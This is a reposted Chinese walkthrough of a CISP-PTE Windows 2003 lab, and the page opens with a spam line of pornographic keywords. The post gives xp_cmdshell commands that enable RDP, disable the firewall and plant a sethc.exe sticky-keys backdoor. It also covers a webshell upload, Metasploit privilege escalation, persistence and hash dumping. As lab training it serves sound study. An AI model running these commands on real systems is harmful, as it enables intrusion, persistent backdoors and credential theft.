国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

CISP-PTE-Windows2003教程

這篇具有很好參考價值的文章主要介紹了CISP-PTE-Windows2003教程。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

為方便后續(xù)操作,建議和kali在同一網段。
獲取到靶機IP后,掃描端口,1433是sqlserver的
CISP-PTE-Windows2003教程
測出用戶名admin,但是密碼爆破失敗
CISP-PTE-Windows2003教程掃描目錄發(fā)現配置文件
CISP-PTE-Windows2003教程配置文件中找到數據庫的用戶名和密碼
CISP-PTE-Windows2003教程使用Microsoft SQL Server Studio連接,注意此時不是sa用戶
CISP-PTE-Windows2003教程數據庫中找到密碼,成功登錄
CISP-PTE-Windows2003教程嘗試上傳文件,但是黑名單限制較死,看到里面已經有人上傳上去,應該是圖片上傳上去繞過,點擊下載查看連接密碼
CISP-PTE-Windows2003教程CISP-PTE-Windows2003教程CISP-PTE-Windows2003教程拿到服務賬戶的權限,與Users賬戶的權限相同。想辦法遠程桌面上去
收集信息,查看網絡連接情況,看到3389沒開
CISP-PTE-Windows2003教程windows平臺一般都有防火墻,netsh firewall show state查看防火墻狀態(tài)

CISP-PTE-Windows2003教程netsh firewall set opmode mod=disable拒絕訪問,權限不夠關不了
CISP-PTE-Windows2003教程利用數據庫操作命令關閉系統(tǒng)防火墻,但是咱們不是sa 用戶沒有權限
而且也沒有xp_cmdshell組件,權限不夠也無法執(zhí)行上傳組件的操作
exec master.sys.sp_addextendedproc ‘xp_cmdshell’, ‘C:\Users\Administrator\Desktop\xplog70\xplog70.dll’
CISP-PTE-Windows2003教程擁有sa(管理員)權限,開啟xp_cmdshell
EXEC sp_configure ‘show advanced options’,1;RECONFIGURE;
EXEC sp_configure ‘xp_cmdshell’,1;RECONFIGURE;

EXEC master.dbo.xp_cmdshell ‘REG ADD “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 00000000 /f’
EXEC master.dbo.xp_cmdshell ‘netsh firewall set opmode disable’
EXEC master.dbo.xp_cmdshell ‘cd C:\WINDOWS\system’
EXEC master.dbo.xp_cmdshell ‘copy cmd.exe c:\WINDOWS\system\sethc.exe’
EXEC master.dbo.xp_cmdshell ‘netstat -an’
修改sa密碼 exec sp_password NULL, ‘pasw’, ‘sa’
嘗試提權

CISP-PTE-Windows2003教程CISP-PTE-Windows2003教程https://www.hacking8.com/mst-sec-lecture-notes/8.html
CISP-PTE-Windows2003教程CISP-PTE-Windows2003教程使用multi/recon/local_exploit_suggeser模塊查看靶機可以利用的漏洞以及相應的模塊
CISP-PTE-Windows2003教程使用第一個模塊嘗試,target默認windows 7
CISP-PTE-Windows2003教程提權成功
CISP-PTE-Windows2003教程權限維持,使用windows/local/persistence模塊快速進行權限維持
CISP-PTE-Windows2003教程導出hash值
CISP-PTE-Windows2003教程CISP-PTE-Windows2003教程復制管理員hash拿去解密或者使用john破解
CISP-PTE-Windows2003教程獲取到密碼后,接下來就去開啟3389端口遠程桌面過去
本來咱們獲取到管理員權限后可以直接執(zhí)行命令,但是shell返回不了,聽說原因有很多
CISP-PTE-Windows2003教程這里使用msf的post/windows/manage/enable_rdp模塊開啟,這個模塊好像也可以創(chuàng)新新的遠程桌面用戶
CISP-PTE-Windows2003教程CISP-PTE-Windows2003教程nmap掃描3389是否開啟,或者nc -v ip 端口
CISP-PTE-Windows2003教程CISP-PTE-Windows2003教程使用kali自帶的rdesktop或者物理機遠程mstsc
CISP-PTE-Windows2003教程CISP-PTE-Windows2003教程之前咱們看到系統(tǒng)有防火墻,msf搜索有沒有關閉防火墻的模塊,但是好像沒有
post/windows/manage/exec_powershell利用此模塊執(zhí)行powershell命令失敗
CISP-PTE-Windows2003教程exploit/windows/local/ms10_015_kitrap0d Yes The service is running, but could not be validated.
2 exploit/windows/local/ms14_058_track_popup_menu Yes The target appears to be vulnerable.
3 exploit/windows/local/ms14_070_tcpip_ioctl Yes The target appears to be vulnerable.
4 exploit/windows/local/ms15_051_client_copy_image Yes The target appears to be vulnerable.
5 exploit/windows/local/ms16_016_webdav Yes The service is running, but could not be validated.
6 exploit/windows/local/ms16_075_reflection Yes The target appears to be vulnerable.
7 exploit/windows/local/ppr_flatten_rec Yes The target appears to be vulnerable.
使用第二個模塊重新反彈一個高權限的shell
CISP-PTE-Windows2003教程反彈的shell還是不能進去
CISP-PTE-Windows2003教程看看meterpreter命令有沒有可用的點,meterpreter命令https://www.cnblogs.com/backlion/p/9484949.html
search -f cmd.exe搜索文件
CISP-PTE-Windows2003教程execute -H -i -f cmd.exe代替shell嘗試獲取終端權限
CISP-PTE-Windows2003教程可以上傳反彈的木馬,然后利用execute執(zhí)行反彈回來,執(zhí)行的時候失敗,太菜
CISP-PTE-Windows2003教程CISP-PTE-Windows2003教程使用vnc,run vnc打開遠程桌面失敗
CISP-PTE-Windows2003教程查看本地用戶組
CISP-PTE-Windows2003教程查看遠程桌面用戶發(fā)現為空
CISP-PTE-Windows2003教程
嘗試將管理員添加進遠程桌面用戶組里面
CISP-PTE-Windows2003教程有域控的話倒是可以將用戶添加到組里面
CISP-PTE-Windows2003教程run getgui -e可以看到RDP已經啟用
CISP-PTE-Windows2003教程run getgui -u admin -p admin添加賬號
CISP-PTE-Windows2003教程post/windows/manage/killav模塊只能殺防護軟件,不能搞防火墻
CISP-PTE-Windows2003教程"">net localgroup "Remote Desktop Users"看到已經成功將admin用戶添加進遠程用戶組
CISP-PTE-Windows2003教程rdesktop -u admin -p admin 192.168.1.119:3389連接還是失敗,感覺是防火墻攔了
現在雖然拿到系統(tǒng)權限,但是拿不到控制臺權限,也就無法關閉防火墻。咱們雖然有管理員賬號密碼,但是咱們不能直接去登錄靶機,要是這樣就簡單了,咱們得用搞遠程的方式來搞它!
不夠好在有數據庫,可以去拿到數據庫sa的密碼,登錄后執(zhí)行數據庫操作繼而來關閉防火墻。
爆破sa用戶密碼,但是無數字典過后還是一無所獲。
CISP-PTE-Windows2003教程修改遠程桌面端口為27689的端口,也就是靶機開放的web端口
CISP-PTE-Windows2003教程CISP-PTE-Windows2003教程CISP-PTE-Windows2003教程協(xié)議不對應,也不行,防火墻只開了1433和27689,控制臺權限拿不了關不了防火墻。sa用戶密碼爆破不出來,系統(tǒng)庫中sa的hash也為NULL。
CISP-PTE-Windows2003教程key3:4d9d3q8v,admin:asdadwn_d2112用這些密碼登錄sa失敗。嘗試其他模塊。
第三個模塊windows/local/ms14_070_tcpip_ioctl用來提權到system
第四個exploit/windows/local/ms15_051_client_copy_image也是提權
剩下的幾個網上搜了一下也都是提權的 模塊,看來防火墻終究是關不了,還是太菜!
meterpreter能獲取,但是shell獲取不到,sa密碼不知道也爆破不出來,防火墻關不掉,知道怎么關的師傅還望不吝賜教!文章來源地址http://www.zghlxwxcb.cn/news/detail-490798.html

到了這里,關于CISP-PTE-Windows2003教程的文章就介紹完了。如果您還想了解更多內容,請在右上角搜索TOY模板網以前的文章或繼續(xù)瀏覽下面的相關文章,希望大家以后多多支持TOY模板網!

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。如若轉載,請注明出處: 如若內容造成侵權/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經查實,立即刪除!

領支付寶紅包贊助服務器費用

相關文章

  • 虛擬機VMware里面安裝Windows sever 2003版本詳細教程

    虛擬機VMware里面安裝Windows sever 2003版本詳細教程

    python當中的第三方wxPython庫的安裝解答_pip install wx_張小魚?的博客-CSDN博客 centos7配置靜態(tài)網絡常見問題歸納_centos7網絡問題_張小魚?的博客-CSDN博客 spark里面配置jdk后的編程與Hadoop配置_張小魚?的博客-CSDN博客 系列精品文章目錄 文章目錄 前言 一、準備工作 下載Windows serve

    2024年02月06日
    瀏覽(28)
  • VMware虛擬機安裝Windows Server 2003

    VMware虛擬機安裝Windows Server 2003

    哈嘍,各位小伙伴大家好,win server2003算是拖了比較久了,一直沒發(fā)布,今天完成server2003的安裝后server系列的安裝教程就告一段落了。馬上暑假了,想必新生開學之后,很多計算機網絡專業(yè)的同學們要開始接觸到Windows Server了,這也是計算機網絡技術專業(yè)的專業(yè)基礎課程,想

    2024年02月09日
    瀏覽(25)
  • windows2003系統(tǒng)SSL證書單站點部署https

    windows2003系統(tǒng)SSL證書單站點部署https

    本文將講解,在windows 2003操作系統(tǒng)下,IIS 6 環(huán)境的服務器ssl證書安裝教程。 安裝前,請準備好SSL證書,沒有的話,可以點這里申請SSL證書 部署前請退出服務器內安裝的殺毒軟件(360、金山、安全狗等安全軟件有可能導致SSL證書部署出錯) 一、解壓證書文件。證書文件解壓后

    2024年02月06日
    瀏覽(23)
  • 關于windows server 2003 web服務器搭建詳解(內涵步驟)

    關于windows server 2003 web服務器搭建詳解(內涵步驟)

    關于windows server 2003 web服務器搭建 實驗環(huán)境:windows server 2003(設置兩個網卡),win 7或xp系統(tǒng),都在同一網段下測試 我的服務器和客戶機均為NAT模式,網段為192.168.19.0 步驟如下: 1、安裝web服務器組件 2 、安裝完成后打開web服務器,Internet信息服務-服務器名-網站-單擊右鍵-新

    2024年02月09日
    瀏覽(21)
  • 在 Windows Server 2003 上部署和配置 IIS 服務器

    在 Windows Server 2003 上部署和配置 IIS 服務器

    本文介紹了在 Windows Server 2003 環(huán)境下部署和配置 IIS 服務器的步驟,包括安裝、配置萬維網服務、查看端口號、發(fā)布靜態(tài)網站、發(fā)布多個網站、發(fā)布動態(tài)網站等操作過程。詳細描述了如何設置網站、分配 IP 地址、驗證網站訪問、解決端口沖突和權限問題,以及綁定不同域名等策略。

    2024年02月22日
    瀏覽(30)
  • Windows Server2003服務器密碼忘記情況下,密碼破解方法匯總

    Windows Server2003服務器密碼忘記情況下,密碼破解方法匯總

    使用微軟官方的MSDaRT,全稱為Microsoft Diagnostics and Recovery Toolset,是微軟的一套完整的系統(tǒng)診斷和修復工具。擁有恢復系統(tǒng)密碼、修復系統(tǒng)文件、清除惡意軟件、還原刪除文件和修復硬盤分區(qū)等諸多功能,目前歸屬于MDOP(即微軟桌面優(yōu)化套件(Microsoft Desktop Optimization Pack))。是最

    2024年02月06日
    瀏覽(28)
  • PL2303驅動程序不支持WINDOWS 11及后續(xù)版本的解決辦法

    PL2303驅動程序不支持WINDOWS 11及后續(xù)版本的解決辦法

    更新了Windows11之后,發(fā)現計算機—設備管理里面的PL2303(USB轉串口的驅動程序)提示:PL2303驅動程序不支持WINDOWS 11及后續(xù)版本,請安裝正確驅動程序。 具體的解決辦法和步驟可參考如下: 安裝舊版本的驅動(下載地址如下,或自己安裝個舊版本的) PL2303 USB轉串口驅動程序

    2024年02月11日
    瀏覽(17)
  • 推薦windows命令行軟件管理工具WinGet,相當方便!

    推薦windows命令行軟件管理工具WinGet,相當方便!

    WinGet是微軟推出的支持win10及以上操作系統(tǒng)的軟件管理工具,全稱為\\\'windows package manager client\\\'。 可以在windows操作系統(tǒng)命令行輕松的安裝/卸載或升級應用程序,里面的軟件庫對接的是\\\'Microsoft Store\\\'(微軟應用商店)。 WinGet工具默認是操作系統(tǒng)本身就自帶的,若是需要升級可以前

    2024年02月09日
    瀏覽(26)
  • 如何關閉“若要接收后續(xù)google chrome更新,您需使用windows10或更高版本”

    如何關閉“若要接收后續(xù)google chrome更新,您需使用windows10或更高版本”

    如何關閉“若要接收后續(xù) google chrome 更新,您需使用 windows 10 或更高版本” - 知乎

    2024年02月12日
    瀏覽(28)
  • ?Unity Vuforia 新手(圖片識別)教程,后續(xù)整理 實體識別 詳細流程

    ?Unity Vuforia 新手(圖片識別)教程,后續(xù)整理 實體識別 詳細流程

    最近有個Holoens2 識別滅火器實體交互的項目,大概有2-3年沒有搞MR的項目了,重新看一下,以前沒有記錄的習慣,現在慢慢培養(yǎng)一下。 小Dome鏈接: link 圖片識別 新手教程鏈接: link 識別物體 新手教程鏈接: link unity Holoens2開發(fā)使用Vuforia 新手教程鏈接: link 運行官方 Vuforia Hololen

    2024年02月04日
    瀏覽(35)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領取紅包,優(yōu)惠每天領

二維碼1

領取紅包

二維碼2

領紅包